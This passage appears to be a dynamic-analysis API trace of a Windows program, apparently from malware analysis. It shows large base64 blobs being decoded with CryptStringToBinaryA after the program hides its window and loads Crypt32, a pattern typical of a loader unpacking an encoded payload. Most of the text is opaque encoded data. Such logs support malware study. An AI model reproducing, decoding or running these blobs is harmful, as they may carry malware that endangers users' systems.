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", cchString=0x1ac0, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0084.524] CryptStringToBinaryA (in: pszString="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", cchString=0x1ac0, dwFlags=0x1, pbBinary=0x642934, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x642934, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0084.524] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0084.524] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0084.524] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0084.524] CryptStringToBinaryA (in: pszString="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kYSpNZLf4rWrsm+D1/KSx4ZU+erPqMqrWpbO4bOQulKH6Y6Hq8BvvdOCqqWvS5LI17utvmz+/O3BkIRW89HgrrSrTanA6b+Tx3mSutOFqcpUnNX2qrKQRZTE0saGqz+p/unLq6VQjdGNkbqtQaq9uKrAkHuQsJakr7RUi+qGrL6TOL/R+5GEqTSS35W1q7Jvg9eHkseGVPnqvKjKq1qWzpyzkLpSh+nxh6vAb73T/6qlr0uSyKS7rb5s/vyYwZCEVvPRl660q02pwJy/k8d5krqghanKVJzVm6qykEWUxL3Ghqs/qf6Ey6ulUI3RnpG6rUGqva2qwJB7kLCBpK+0VIvqk6y+kzi/0eiRhKk1kt+Itauyb4PXmJLHhlT56qGoyqtals6Ps5C6Uofp5IerwG+90+iqpa9Lksixu62+bP78i8GQhFbz0bqutKtNqcCzv5PHeZK6jYWpylSc1aiqspBFlMSIxoarW6n+s8urpYWN0auRuq3rqr2eqsCQypCwvKSvtPKL6qysvpM7v9HVkYSpLZLfu7Wrsv2D162Sx4ZX+eqWqMqr8JbOurOQumOH6deHq8BBvdPFqqWvA5LInrutvif+/KbBkIQz89GprrSrbanApr+Tx+CSupqFqcqZnNW9qrKQg5TEm8aGqzOp/q7Lq6VFjdG0kbqtTaq9g6rAkMSQsK+kr7Rqi+q5rL6Tx7/RwpGEqU2S3661q7L6g9e+kseGM/nqe6nKq+uWzlWykLomh+k6hqvANL3TNqulryuSyGu6rb5t/vxRwJCEVvPRXK+0q02pwFW+k8d5krpnhKnKVJzVQquykEWUxGbHhqs/qf5dyqulUI3RQZC6rUGqvXSrwJB7kLBapa+0VIvqSq2+kzi/0S+QhKk1kt9BtKuyb4PXU5PHhlT56mipyqtals5AspC6UofpLYarwG+90yOrpa9Lksh4uq2+bP78TMCQhFbz0UOvtKtNqcBIvpPHeZK6dISpylSc1VerspBFlMRxx4arP6n+SMqrpVCN0VKQuq1Bqr1Zq8CQe5CwdaWvtFSL6metvpM4v9EckISpNZLfdLSrsm+D12STx4ZU+epdqcqrWpbOc7KQulKH6RCGq8BvvdMcq6WvS5LIRbqtvmz+/H/AkIRW89F2r7SrTanAf76Tx3mSukGEqcpUnNVkq7KQRZTEXMeGqz+p/mfKq6VQjdF/kLqtQaq9SqvAkHuQsGClr7RUi+pwrb6TOL/RCZCEqTWS32e0q7Jvg9d5k8eGVPnqQqnKq1qWzm6ykLpSh+kDhqvAb73TCaulr0uSyFK6rb5s/vxqwJCEVvPRZa+0q02pwBK+k8d5krouhKnKVJzVCauykEWUxC/Hhqs/qT7+NJIf+UmSCMVFlATHOL8Rk269E5g8nBXlVIsq6lKHKYh5knre35Bw5lqWDudNqQDmTqp9zFr5Ks1b8xHtXI0R9WSDF/hm/jzuNqk+7T2SH+xMkgjSQ5QE0j2/EYBrvRP1V5wVilaLKodThyn7eZJ6q3uQcJFnlg6S+KkAlaCqfbEP+SqycfMRkEONEYZZgxeNBf48maSpPphjkh+f4pIIvxeUBL2gvxHtNL0T5v2cFZ9DiyqQdocp7mSSerhhkHCMcZYOjdGpAIimqn2iYfkqp2rzEYeZjRGTuYMXno3+PLToqT63RZIfsoeSCIw1lASIrL8R2gS9E9PEnBWshIsqrSyHKdHrknqFVZBwvwaWDrjNqQC/mqp9l7H5KpR78xGqMI0RvBqDF7Nu/jynP6j+CsqrpVBLVE0FRThABjgTVLLqJ6nKqw